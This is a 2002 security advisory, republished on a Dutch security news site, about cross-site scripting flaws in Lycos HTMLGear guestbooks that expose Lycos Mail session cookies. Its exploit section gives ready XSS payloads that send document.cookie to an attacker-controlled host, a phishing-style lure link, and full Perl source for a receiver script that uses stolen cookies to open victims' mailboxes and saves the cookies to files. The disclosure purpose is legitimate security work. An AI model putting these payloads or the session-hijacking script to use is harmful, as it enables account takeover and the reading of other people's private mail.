DSINet.org
 world news  dutch news  archive  files  hyperlinks  about
search
home :: World News
last site update
world news : 06-09-2006 14:00
dutch news : 14-06-2006 18:30
world news
latest dutch news
Never change a
Beer for a girl
Winning Team
Shell for a candy
[See results]
Lycos XSS/Cookie problems Advisory
by Digiover - 04-11-2002 16:45 - Source:
'Matthew Murphy' found on Sept 14 2002 some bugs in the HTMLGear Guestbook, which can be viewed on[1].

Besides those bugs, the HTMLGear got also a XSS in 'control.guest' on the lycos.com server. Both bugs can be used to get the cookies from users of the site.

The real problem in this is that through this way people their lycosmail cookies can be captured. This can be done when people use the "Save User Name & Password" option when login in and don't log out. Closing the browser wil not log them out. With the cookie of a lycosmail user, people can have access to their mailbox. 

--------------------------------
 Lycos XSS/Cookie problems Advisory
----------------------------------------

Lycos XSS/Cookie problems
04/11/02
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)


-------------------
Vendor Information:
-------------------

Homepage        : http://www.lycos.com
Vendor informed
  About bug : -
  Mailed advisory: 01/11/02
Vender Response : None (yet?)
Version on site : control.guest still vulnerable for XSS
                  Cookie capturing still possible

Because of not answering in the past, I didn't wait 
long before making this advisory public.


-------------------
Affected  Versions:
-------------------

Tested on:
- Lycos.com Mail 


Not tested on:
- Other Lycos services 


-------------------
Description:
-------------------

What is lycos?
-------------

- http://login.mail.lycos.com/
    
   - Lycos Mail is a full featured web-based email solution. Lycos Mail
     now offers two levels of email service, a standard FREE version 
     and a NEW Lycos Mail Plus option for the more demanding user. 
    

- http://htmlgear.lycos.com

   - Professional Gears!
     Professional Gears eliminate ALL ads and HTML Gear branding and 
     give you the freedom to integrate Gears more seamlessly on your 
     site. The result is a more professional-looking Gear that's 
     perfect for business and personal sites. Here are just a few of 
     the reasons why you should go pro . . .


-------------------
Vulnerability:
-------------------

'Matthew Murphy' found on Sept 14 2002 some bugs in the 
HTMLGear Guestbook, which can be viewed on:
- http://online.securityfocus.com/archive/1/292131
- http://online.securityfocus.com/bid/5728

Besides those bugs, the HTMLGear got also a XSS in 'control.guest'
on the lycos.com server. Both bugs can be used to get the cookies 
from users of the site.
The real problem in this is that through this way people their 
lycosmail cookies can be captured. This can be done when people 
use the "Save User Name & Password" option when login in and don't
log out. Closing the browser wil not log them out.
With the cookie of a lycosmail user, people can have access to their 
mailbox.


-------------------
Exploit:
-------------------

Inject javascript into the htmlgear of none patched/bad filtered guestbooks:

- <IMG SRC="javascript:window.open('http://host/cgi-bin/fragile.pl?
  '%2Bdocument.cookie);">
- <IMG SRC="http://a.a/a" onerror="poof:window.open(
  'http://host/cgi-bin/fragile.pl?'+document.cookie);">
- <IMG SRC="http://ly.lygo.com/ly/0/hp/dog.gif" onload="poof:
  window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);">

Or let people click on the next url:

- http://htmlgear.lycos.com/guest/control.guest?u=poof&a=">
  <script>window.open('http://host/cgi-bin/fragile.pl?'%2B
  document.cookie)%3B</script>

This can be done by letting people click on a link, which you can
mail them:

- <a href="http://htmlgear.lycos.com/guest/control.guest?u=poof&a=
  %22%3E%3Cscript%3Ewindow.open('http://host/cgi-bin/fragile.pl?'%25
  2Bdocument.cookie)%3C/script%3E">Britney Nude!


All will connect with a perl script (fragile.pl), this script will 
take the cookie, and make a connection to lycos.com to login on
the mailserver using the cookie. Then it wil request the inbox or 
the frontpage of the mailbox of the user. 
With the third option in the exploit it just captures the cookies 
and write them in a file together with the emailaddress.
This is just a proof of concept, you could also change it to let 
it read mail. Please don't email me with request to write 
that.

-------------------
Fragile.pl
-------------------

#!/usr/bin/perl -w
#
# Lycos.com XSS/Cookie Problems
# N|ghtHawk
# nighthawk_at_hackers4hackers.org

use IO::Socket;

# OPTIONS
# 1. See Mail Frontpage
# 2. See Inbox
# 3. Only save Cookie
$option = 2;

# PATH
$path = "/tmp/";

$cookie = "$ENV{QUERY_STRING}\;";
$cookie =~ s/%20/ /g;

if ($cookie !~ "MAYA") {
  &no_cookie;
}

$ip = "209.202.220.97";
$host = "login.mail.lycos.com";
$req = "\/?callback\=http:\/\/inbox.mail.lycos.com\/jumpPage.shtml";

$data = request($ip, $host, $req);

@datar = split(/\n/,$data);
foreach $line (@datar) {
  if ($line =~ /[Cc]ookie: *(.*)\; *.*\;/) {
    $line = $1;
    if ($line !~ "L_LOC") {
      $cookie .= " $line\;";
    } else {
      $cookie .= " $line";
    }
  } elsif ($line =~ /Location: *http\:\/\/inbox.mail.lycos.com(.*)/) {
    $req = $1;
  }
}

if ($option == 1 || $option == 3) {
  $ip = "209.202.220.100";
  $host = "inbox.mail.lycos.com";
  $data = request($ip, $host, $req);
  out($data);
}

if ($option == 2) {
  $ip = "209.202.220.97";
  $host = "login.mail.lycos.com";
  $req =
"\/bounce.shtml?goto=folder&folderId=!1inbox&user=&count=1";
  $data = request($ip, $host, $req);
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    if ($line =~ /Location: *http:\/\/(.*com)(\/.*)/) {
      $host = $1;
      $req = $2;
    }
  }
  $data = request($host,$host,$req);
  out($data);
}

sub out {
  my ($data) = @_;
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    if ($line =~ /<b>Hello, * (.+\@lycos.com)<\/b>/) {
      $name = $1;
    }
  }
  if ($option == 3) {
    $data = "$name\n$cookie\n";
    $name = "cookies";
  }
  open(FILE,">$path$name.html");
  print FILE "$data\n";
  close(FILE);

  print "Content-type: text/html\n";
  print "Location: http://www.dwheeler.com/secure-programs".
        "/Secure-Programs-HOWTO.html\n\n";
}

sub request {
  my ($ip, $host, $req) = @_;
  $sock = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$ip",
  PeerPort => "80",
  Timeout => 30) || die "Could not create socket: $!\n";
  print $sock "GET $req HTTP/1.0\n".
  "Host: $host\n".
  "Accept: image/gif, image/x-xbitmap, */*\n".
  "Accept-Language: nl\n".
  "User-Agent: Pr00fOfConcept/1.0 \n".
  "Connection: Keep-Alive\n".
  "Cookie: $cookie\n\n";
  sleep(2);
  recv($sock,$data,200000,0);
  close($sock);
  return $data;
}

sub no_cookie {
  print "content-type: text/html\n\n";
  print "<h1>No Lycos Mail Cookie found</h1>\n";
  exit;
}


-------------------
Patch:
-------------------

Well, it's up to Lycos to patch this. It would be a good idea 
not to put insecure scripts on a server which uses the same 
cookies as your mailsystem.


-------------------
Thanks:
-------------------

Wim, Digiover, Asby

-------------------
1. http://online.securityfocus.com/archive/1/292131 and http://online.securityfocus.com/bid/5728.
Announcement
reply
secunia
virus alerts
Win32.Gimmiv.a - 10/26/2008 - Threat Level: Low
Win32.ACVE.o - 10/2/2008 - Threat Level: Low
Win32.Adload.aro - 10/2/2008 - Threat Level: Low
Win32.Adload.asj - 10/2/2008 - Threat Level: Low
Win32.Adload.ask - 10/2/2008 - Threat Level: Low
Win32.Adload.asn - 10/2/2008 - Threat Level: Low
bugtraq
dsinet login
user
password
Login securely here
Forgot password?
© 2000 - 2005 Dutch Security Information Network - Disclaimer - DSINet.org - Suggest News